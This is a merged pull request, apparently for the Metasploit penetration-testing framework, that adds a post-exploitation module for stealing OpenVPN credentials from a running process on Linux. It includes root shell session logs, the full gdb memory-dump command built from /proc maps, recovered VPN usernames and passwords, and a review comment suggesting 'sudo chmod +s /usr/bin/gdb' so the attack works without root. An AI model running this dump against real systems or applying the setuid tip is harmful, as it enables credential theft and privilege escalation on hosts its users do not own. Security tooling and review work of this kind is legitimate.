### PR TITLE
Add OpenVPN Grab Credentials - Post Module

### PR DESCRIPTION
**Pull request by espreto**
#### Add VPN Grab Credentials

  This module grab VPN credentials from a running vpn process in Linux.

  References:
    https://gist.github.com/rvrsh3ll/cc93a0e05e4f7145c9eb#file-openvpnscraper-sh
#### Test environment:

  OpenVPN
    http://linuxlove.eu/howto-setup-openvpn-on-ubuntu-15-04/
#### Softwares

  OpenVPN</br>
##### OpenVPN

```
msfdevel 192.168.0.4 shell[s]:0 job[s]:0 msf> exploit(handler)  exploit 

[*] Starting the payload handler...
[*] Started bind handler
[*] Command shell session 3 opened (192.168.0.4:34386 -> 192.168.0.4:4444) at 2015-10-19 23:22:41 -0200

id
uid=0(root) gid=0(root) groups=0(root)
ps aux | grep openvpn
root      4935  0.0  0.0   6792  1948 pts/13   S+   23:21   0:00 sudo openvpn --config vpnbook-euro1-tcp443.ovpn
root      4936  0.0  0.1   5564  2808 pts/13   S+   23:21   0:00 openvpn --config vpnbook-euro1-tcp443.ovpn
root      5261  0.0  0.0   4676   820 pts/0    S+   23:23   0:00 grep openvpn
espreto  28130  0.0  1.0 275532 20720 ?        Ssl  22:39   0:02 gvim modules/post/linux/gather/openvpn_credentials.rb
^Z
Background session 3? [y/N]  y
msfdevel 192.168.0.4 shell[s]:1 job[s]:0 msf> exploit(handler)  use post/linux/gather/openvpn_credentials 
msfdevel 192.168.0.4 shell[s]:1 job[s]:0 msf> post(openvpn_credentials)  set SESSION 3
SESSION => 3
msfdevel 192.168.0.4 shell[s]:1 job[s]:0 msf> post(openvpn_credentials)  set PID 4936
PID => 4936
msfdevel 192.168.0.4 shell[s]:1 job[s]:0 msf> post(openvpn_credentials)  run

[+] Module running as "root" user
[*] OpenVPN Credentials stored in /home/espreto/.msf4/loot/20151019232421_default_192.168.0.4_openvpn.creds_333181.txt
[*] Post module execution completed
msfdevel 192.168.0.4 shell[s]:1 job[s]:0 msf> post(openvpn_credentials)  cat /home/espreto/.msf4/loot/20151019232421_default_192.168.0.4_openvpn.creds_333181.txt
[*] exec: cat /home/espreto/.msf4/loot/20151019232421_default_192.168.0.4_openvpn.creds_333181.txt

User: vpnbook
Pass: 8uWrepAw
msfdevel 192.168.0.4 shell[s]:1 job[s]:0 msf> post(openvpn_credentials)  set VERBOSE true
VERBOSE => false
msfdevel 192.168.0.4 shell[s]:1 job[s]:0 msf> post(openvpn_credentials)  run

[+] Module running as "root" user
[+] OpenVPN Credentials:
User: vpnbook
Pass: 8uWrepAw
[*] OpenVPN Credentials stored in /home/espreto/.msf4/loot/20151019232835_default_192.168.0.4_openvpn.creds_761404.txt
[*] Post module execution completed
msfdevel 192.168.0.4 shell[s]:1 job[s]:0 msf> post(openvpn_credentials)
```

### CODE REVIEW

File: modules/post/linux/gather/openvpn_credentials.rb [hunk 1]
```diff
@@ -0,0 +1,75 @@
...
+
+  def pid
+    datastore['PID']
+  end
+
+  def run
+    user = cmd_exec('/usr/bin/whoami')
+    print_good("Module running as \"#{user}\" user")
+
+    unless is_root? && user == 'root'
```
Comment (void-in) [inline modules/post/linux/gather/openvpn_credentials.rb]: Why the user need to be 'root'? sudo won't work?

Comment (wvu-r7) [inline modules/post/linux/gather/openvpn_credentials.rb]: Seems redundant. Just ```is_root?``` should be sufficient. Needs root because ```ptrace```.

Comment (espreto) [inline modules/post/linux/gather/openvpn_credentials.rb]: @void-in Yes, need to be root. As @wvu-r7 appointed, the reason is the Kernel hardening stuff build into the Ubuntu kernel.
You would need to change the ```/proc/sys/kernel/yama/ptrace_scope``` file (with 0) to use sudo.
or
```sudo chmod +s /usr/bin/gdb```

Comment (wvu-r7) [inline modules/post/linux/gather/openvpn_credentials.rb]: ```sudo chmod +s /usr/bin/gdb```... hahaha. :(

Comment (espreto) [inline modules/post/linux/gather/openvpn_credentials.rb]: Yeah. :( #privesc But works! Hahaha :/

**Comment by shandelman116** [comment]
awesome!

**Comment by wchen-r7** [comment]
I keep getting auth fails from the free vpn, I will come back to this later.

File: modules/post/linux/gather/openvpn_credentials.rb [hunk 2]
```diff
@@ -0,0 +1,75 @@
...
+  def run
+    user = cmd_exec('/usr/bin/whoami')
+    print_good("Module running as \"#{user}\" user")
+
+    unless is_root?
+      print_error('This module requires root permissions.')
+      return
+    end
+
+    cmd_exec('/bin/grep rw-p /proc/'"#{pid}"'/maps | sed -n \'s/^\([0-9a-f]*\)-\([0-9a-f]*\) .*$/\1 \2/p\' | while read start stop; do /usr/bin/gdb --batch-silent --silent --pid '"#{pid}"' -ex "dump memory '"#{pid}"'-$start-$stop.dump 0x$start 0x$stop"; done')
```
Comment (wchen-r7) [inline modules/post/linux/gather/openvpn_credentials.rb]: This dump can be pretty noisy. Can you dump this to /tmp, or somewhere?

Comment (espreto) [inline modules/post/linux/gather/openvpn_credentials.rb]: Yes! Added ```/tmp``` as an option. :)

**Comment by espreto** [comment]
@wchen-r7 The password is dynamic. Check the [url](http://www.vpnbook.com/freevpn) to get the password of the day.

**Comment by wchen-r7** [comment]
@espreto Yeah actually I've tried that too. I wonder if it's because I tried too many times so they locked me out or whatever.

@wvu-r7 is interested in handling this, so I'll let him pick this up.

**Comment by espreto** [comment]
@wchen-r7 @wvu-r7 
I made a small change. :)

```
msf> post(openvpn_credentials)  set VERBOSE true
VERBOSE => true
msf> post(openvpn_credentials)  run

[+] Module running as "root" user
[+] Succesfully dump.
[+] Removing temp files successfully.
[+] OpenVPN Credentials:
User: vpnbook
Pass: MuQu4ust
[*] OpenVPN Credentials stored in /home/espreto/.msf4/loot/20151117000950_default_192.168.0.14_openvpn.grab_629028.txt
[*] Post module execution completed
msf> post(openvpn_credentials)  cat /home/espreto/.msf4/loot/20151117000950_default_192.168.0.14_openvpn.grab_629028.txt
[*] exec: cat /home/espreto/.msf4/loot/20151117000950_default_192.168.0.14_openvpn.grab_629028.txt

User: vpnbook
Pass: MuQu4ust
msf> post(openvpn_credentials) 
```

**Comment by wvu-r7** [comment]
Doesn't work with ```--auth-nocache```. Should be noted in the description.

**Comment by wvu-r7** [comment]
https://github.com/rapid7/metasploit-framework/commit/601d4fda9f44be7fa34287b4bf36f992f6809584

**Comment by wvu-r7** [comment]
FYI, Volatility does this: https://github.com/Phaeilo/vol-openvpn.

**Comment by espreto** [comment]
@wvu-r7 Exact. With ```--auth-nocache``` this module not working. Thank you for adding this note in the description --  you’re the man! :+1:

**Pull request merged**